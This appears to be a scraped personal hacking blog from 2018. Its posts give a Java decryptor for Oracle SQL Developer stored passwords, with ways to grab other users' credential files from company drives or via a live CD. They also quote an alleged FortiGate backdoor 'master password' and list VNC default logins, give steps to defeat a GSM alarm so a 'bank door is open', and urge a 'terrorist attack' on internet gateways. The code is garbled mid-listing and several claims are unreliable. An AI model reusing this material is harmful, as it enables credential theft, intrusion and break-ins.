Saturday, December 8, 2018

ORACLE DB password decryptor

welcome back to war! saturday,06.55 am!
check it out:

In product-preferences.xml the other pieced of the needed information is found in the following tag:

With these two values and the following Java program, you're now able to decrypt the password:
java Decrypt_V4 F35q3vdbVrI= 3e8efb59-8a5a-4c13-b1d5-ff64f987787f

Oracle SQL Developer password decryptor

Oracle SQL Developer allows a user to associate passwords with connections so that the user doesn't have to enter the password each time he opens a connection.
Of course, these passwords need to be stored somewhere. SQL developer stores them in an encrypted form, but it is possible to decrypt them.
In case of SQL developer version 4, two files are needed to find the information to encrypt these passwords. On Windows, these are
  • %APPDATA%\SQL Developer\system*\o.jdeveloper.db.connection*\connections.xml
  • %APPDATA%\SQL Developer\system*\o.sqldeveloper*\product-preferences.xml
%APPDATA% typically has a value of c:\user\username\AppData\Roaming)
In connections.xml, one piece of the needed information is found in the Contents tag:

   F35q3vdbVrI=
In product-preferences.xml the other pieced of the needed information is found in the following tag:
With these two values and the following Java program, you're now able to decrypt the password:
java Decrypt_V4 F35q3vdbVrI= 3e8efb59-8a5a-4c13-b1d5-ff64f987787f

Finding connections.xml and product-preferences.xml

As the two required files are found under %appdata%, they are typically unaccessible for other users.
However, there are at least two ways to access such files.

1. Using a Linux live CD

If you have physical access to the PC or laptop that has the connections.xml and product-preferences.xml and its harddisk is not encrypted, you can mount the PC harddisk with a Linux [live CD (such as Knoppix) and copy the necessary information

2. Using dir /s /b on the company drive

In many (big) companies, there is usually one or more »company drives« that all sorts of people and divisions or departments can store temporary files. Sometimes, database users backup theirconections.xml and product-preferences.xml on such drives.
Assuming this »company drive« is X:, then you can find these files in a cmd.exe window using
cd /d X:
dir /s /b connections.xml product-preferences.xml
You might also be lucky searching git or subversion repositories etc.

Source code (java)

// vi: ft=java

import java.security.MessageDigest;
import java.security.GeneralSecurityException;

import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

import javax.xml.bind.DatatypeConverter;

//     Requires Java 8:
import java.util.Base64;


public class Decrypt_V4 {

  private static byte[] des_cbc_decrypt(
       byte[] encrypted_password,
       byte[] decryption_key,
       byte[] iv)
  throws GeneralSecurityException
  {

    Cipher cipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
    cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(decryption_key, "DES"), new IvParameterSpec(iv));
    return cipher.doFinal(encrypted_password);

  }

  private static byte[] decrypt_v4(
      byte[] encrypted,
      byte[] db_system_id)
  throws GeneralSecurityException
  {

    byte[] encrypted_password = Base64.getDecoder().decode(encrypted);

    byte[] salt = DatatypeConverter.parseHexBinary("051399429372e8ad");

 // key = db_system_id + salt
    byte[] key = new byte[db_system_id.length + salt.length];
    System.arraycopy(db_system_id, 0, key, 0, db_system_id.length);
    System.arraycopy(salt, 0, key, db_system_id.length, salt.length);


    java.security.MessageDigest md = java.security.MessageDigest.getInstance("MD5");
    for (int i=0; i<42 -="" 0="" 8="" argv="" byte="" catch="" db_system_id="" des_cbc_decrypt="" e.tostring="" e="" encrypted="argv[0].getBytes();" encrypted_password="" i="" iv="" key.length="" key="" main="" password="" pre="" public="" return="" secret_key="" static="" string="" system.arraycopy="" system.out.println="" tring="" try="" void="" x="" xception="">

Github respository Oracle-SQL-developer-password-decryptor, path: /Decrypt_V4.java


Links

Ideas and knowhow were taken from https://gist.github.com/ajokela/1846191 and https://github.com/maaaaz/sqldeveloperpassworddecryptor
Source files on github
at No comments:

Friday, December 7, 2018

...and this is the news...NSA firewall fortinet version 5.0.7 ...running...confirmed on twitter

master password for juniper OS from the US gov is :
" FGTAbc11*xy+Qqz27"
...and this is the news...NSA firewall fortinet version 5.0.7 ...running...confirmed on twitter

FORUM.FORTINET.COM
SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 | Fortinet Technical Discussion Forums
SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7http://seclists.org/fulldisclosure/2016/Jan/26 I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share. 

at No comments:

thank you Lord...vodafone FTTH network SIBS...take a look...timing attack...operator by operator...voilá


/*If pw == in returns 1, else returns 0 */
int compVar (char *pw, char *in) {
int i;
for (i=0; i<7 class="text_exposed_show" i="" span="" style="display: inline; font-family: inherit;">
if (pw[i]!=in[i]) {
return 0;
}
}
return 1;
}
int main(void) {
int comp=1;
char pw[]="secret";
char in[7];
int result;
scanf ("%s", in);
result = compVar(pw, in);
printf ("%d", result);
}
at No comments:

and....big cake, around here...(submarines cables national level..) Telvent Portugal, S.A.

and....big cake, around here...

ITCONIC.COM
Itconic - Innovate IT
Empresa global de servicios IT, líder en la gestión de Centros de Datos…
at No comments:

hello worlwide! welcome to another weekend, friday, 06.50 am...nobodies hour!!...back to war!

at No comments:

Thursday, December 6, 2018

no news, besides TI, selling to friends a " switched capacitor voltage inverter with a low noise, −0.23 V fixed negative voltage " that was...what we need to inihibit their frequency...but...however...we can manipulate the bits...and not the waveforms...so...check this one out:

the repeater acts like a proxy, sitting in the middle between the server and viewer. All data for the session is passed through the repeater meaning that the viewer and server can both be behind a NAT firewall, without having to worry about forwarding ports or anything else (providing the repeater is visible to both viewer and server).

WARNING:  In MODE I the repeater works like a proxy.  If you don't limit the destination and or ports your repeater can be used to connect to all ip adresses and all ports that can be reached from the repeater.

You need to restrict the ip addreses and ports to prevent unwanted access.

Default VNC ports 5901, 5500
Default Webgui:80
Default user: admin
Default password: adminadmi2



UVNC.COM
UltraVNC VNC OFFICIAL SITE, Remote Access, Support Software, Remote Desktop Control Free Opensource
VNC remote access software, support server and viewer software for on demand remote computer…

at No comments:

"hello world" welcome back to war! ...so I've been out for one week, last subject was SIGFOX network...while, the piece of shit, eat and drink, with maids open and closing doors for TV presumption of importance, they would never have, on another "system" ..talking, 1 million times, meeting after meeting of codfishes, of "consolidação orçamental"!!! So...here we are, with some mundane, simplistic, stupid subject...as GSM alarms...and how to beat the "men from the system" the police "good guys" !!!! So...two aspects..if you cut the wires, of the gsm alarm, the alarm still works because it will be backup with baterries, 2nd aspect..you only reset security programming, with voltage noise inter connection on the motherboard. Let's see the video, to fuck the "system" 1st...find the connector to the motherboard, and place a clip, on the black and green wires!!! It will fool the power supply!...then soldering one LED, to the power connector, yellow and black wires! Voilá!!! Bank door is open!

at No comments:

Wednesday, November 28, 2018

The Script - Hall of Fame (Lyric) ft. will.i.am

at No comments:
hello again. Last night..we talked about anarchism, with all its arguments for a better society. started with the example, of not being rules by any gov. code...who keeps money which is found at the street? ...naturally, who finds it first! that's natural order ruling natural disorder! Is "naturally" accepted"...; also, any crime, or conflit, would be solved "naturally" not by killing the offender, or by take him to prison, where we all have to pay, agreeing or not , with prison time...but by "exceplling" the subject out of our city, our region, our country..and then again, to where...to an world without political frontiers! Conclusion was, and is, natural order is more fair than imposed order, democratic or not! and..more peacefull! Now that lead us, to the "The Island " movie, inspired on the Erasmu's (a girl) philosophy book "The Utopia" ! Where 200 actors are all nude, experiment to live on a Island where nature is gather with peace and justice...of course...the movie did not win no Cannes awards! envy..i suppose! and was not seen or talked by the media! Well...starting on Platus, defending that society should lived nude, and that's one of the aspects of equality, the fact is...a love story prooved to be the reason why that organization failed, at the end. So, anarchism, without a rule of decency, would fail. But having one written, rule, is breaking the philosophy. Therefore...the anarchism will rule, on the virtual world. That is, a non frontier political world, without no freedom limits...will determine, that, in the essential, of all the "systems", is to become domained by those who do not accept, bonds, or do not accept to live under the ruling of inferiors.
at No comments:

"hello world" welcome back to war, wednesday, 09.50 am! Talking about natural human society order ruling the natural disorder...ignoring that, imposed order creates conflits, and natural order deletes and expells treads, in a non frontier political world...we are actually talking about, virtual anarchism, ruling over human animals social political organizations...this means, cutting internet communications wouldn't be a hypothesys of a nuclear bomb as a pressure action...but a terrorist attack, which "naturally" ends the "inconstitutional" situation. Shutdown the following ip gateways.

at No comments:

Tuesday, November 27, 2018

Mortal Kombat Theme Song Original

at No comments:
Subscribe to: Posts (Atom)